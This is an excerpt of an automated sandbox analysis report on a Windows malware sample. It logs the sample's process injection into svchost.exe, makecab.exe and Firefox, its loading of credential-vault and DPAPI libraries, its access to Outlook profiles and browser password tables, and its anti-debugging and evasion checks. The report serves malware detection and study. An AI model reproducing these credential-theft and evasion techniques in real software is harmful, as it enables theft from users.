            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeFile created: C:\Users\user\AppData\Local\Temp\embowelingJump to behavior
            Source: 8mmZ7Bkoj1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: makecab.exe, 00000006.00000003.2337229240.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2336582609.0000000002B21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 8mmZ7Bkoj1.exeReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeFile read: C:\Users\user\Desktop\8mmZ7Bkoj1.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\8mmZ7Bkoj1.exe "C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"
            Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8mmZ7Bkoj1.exe"Jump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 8mmZ7Bkoj1.exeStatic file information: File size 1366295 > 1048576
            Source: Binary string: makecab.pdbGCTL source: svchost.exe, 00000001.00000003.2111036861.000000000282A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2110933749.000000000281B000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000002.3561180212.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eKxwLXHhqpgy.exe, 00000005.00000002.3560737950.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp, eKxwLXHhqpgy.exe, 00000007.00000000.2224546408.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2155609002.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2032565118.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036860924.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.000000000489E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.0000000004700000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2155490594.000000000454C000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2145069382.000000000439C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2155609002.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2032565118.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036860924.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, makecab.exe, 00000006.00000002.3561799198.000000000489E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.3561799198.0000000004700000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2155490594.000000000454C000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2145069382.000000000439C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: makecab.pdb source: svchost.exe, 00000001.00000003.2111036861.000000000282A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2110933749.000000000281B000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000005.00000002.3561180212.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: makecab.exe, 00000006.00000002.3562512745.0000000004D2C000.00000004.10000000.00040000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2451289116.000000001C1CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: makecab.exe, 00000006.00000002.3562512745.0000000004D2C000.00000004.10000000.00040000.00000000.sdmp, makecab.exe, 00000006.00000002.3560929755.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2451289116.000000001C1CC000.00000004.80000000.00040000.00000000.sdmp
            Source: 8mmZ7Bkoj1.exeStatic PE information: real checksum: 0xa961f should be: 0x159e18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02421AE3 push 88B26662h; iretd 1_2_02421B18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02425A83 push cs; ret 1_2_02425BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02421B47 push 88B26662h; iretd 1_2_02421B18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02428B73 push 15314FBEh; retf C913h1_2_02428BDD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02425B1A push cs; iretd 1_2_02425B1C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02413330 push eax; ret 1_2_02413332
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0243E3B3 push edi; iretd 1_2_0243E3B9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0241D67D push eax; ret 1_2_0241D67E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02418604 pushad ; iretd 1_2_02418605
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02411F8B push ebp; retf 1_2_02411F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02428CE2 push eax; retf 1_2_02428CE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024184EF push ss; retf 1_2_024184F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD push ecx; mov dword ptr [esp], ecx1_2_02E309B6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047309AD push ecx; mov dword ptr [esp], ecx6_2_047309B6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281C2A7 push ebp; iretd 6_2_0281C2AC
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028052D1 pushad ; iretd 6_2_028052D2
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281C33E push ss; ret 6_2_0281C346
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281D360 push esi; retf 6_2_0281D36B
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0282B080 push edi; iretd 6_2_0282B086
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028051BC push ss; retf 6_2_028051C6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280E7B0 push 88B26662h; iretd 6_2_0280E7E5
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028127E7 push cs; iretd 6_2_028127E9
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02812750 push cs; ret 6_2_0281288D
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02823750 push eax; ret 6_2_02823706
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02817457 push edx; ret 6_2_028174C6
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0280E814 push 88B26662h; iretd 6_2_0280E7E5
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_028159AF push eax; retf 6_2_028159B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045D4568 push esi; iretd 6_2_045D457A
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045D5751 push ds; ret 6_2_045D5753
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045D6397 push ds; iretd 6_2_045D63A3
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_045D0DF7 push cs; iretd 6_2_045D0DF8
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\8mmZ7Bkoj1.exeAPI/Special instruction interceptor: Address: 40D846C
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\makecab.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E rdtsc 1_2_02E7096E
            Source: C:\Windows\SysWOW64\makecab.exeWindow / User API: threadDelayed 3883Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeWindow / User API: threadDelayed 6090Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\makecab.exeAPI coverage: 3.2 %
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7872Thread sleep count: 3883 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7872Thread sleep time: -7766000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7872Thread sleep count: 6090 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7872Thread sleep time: -12180000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe TID: 7940Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\makecab.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0281C541 FindFirstFileW,FindNextFileW,FindClose,6_2_0281C541
            Source: firefox.exe, 00000008.00000002.2453082168.000002469C18D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^UP
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561304982.00000000012DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\makecab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E rdtsc 1_2_02E7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024277C3 LdrLoadDll,1_2_024277C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h]1_2_02E402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h]1_2_02E402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h]1_2_02E402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02E3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402A0 mov eax, dword ptr fs:[00000030h]1_2_02E402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E402A0 mov eax, dword ptr fs:[00000030h]1_2_02E402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02EC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h]1_2_02EC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E284 mov eax, dword ptr fs:[00000030h]1_2_02E6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E284 mov eax, dword ptr fs:[00000030h]1_2_02E6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h]1_2_02EB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h]1_2_02EB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h]1_2_02EB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h]1_2_02E34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h]1_2_02E34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h]1_2_02E34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2826B mov eax, dword ptr fs:[00000030h]1_2_02E2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h]1_2_02EE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB8243 mov eax, dword ptr fs:[00000030h]1_2_02EB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB8243 mov ecx, dword ptr fs:[00000030h]1_2_02EB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A250 mov eax, dword ptr fs:[00000030h]1_2_02E2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36259 mov eax, dword ptr fs:[00000030h]1_2_02E36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2823B mov eax, dword ptr fs:[00000030h]1_2_02E2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h]1_2_02E403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02E4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02E4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02E4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E663FF mov eax, dword ptr fs:[00000030h]1_2_02E663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC3CD mov eax, dword ptr fs:[00000030h]1_2_02EEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02E3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h]1_2_02E383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB63C0 mov eax, dword ptr fs:[00000030h]1_2_02EB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h]1_2_02EDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h]1_2_02EDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02EDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h]1_2_02EDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED43D4 mov eax, dword ptr fs:[00000030h]1_2_02ED43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED43D4 mov eax, dword ptr fs:[00000030h]1_2_02ED43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h]1_2_02E2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h]1_2_02E2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h]1_2_02E2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5438F mov eax, dword ptr fs:[00000030h]1_2_02E5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5438F mov eax, dword ptr fs:[00000030h]1_2_02E5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h]1_2_02E28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h]1_2_02E28397
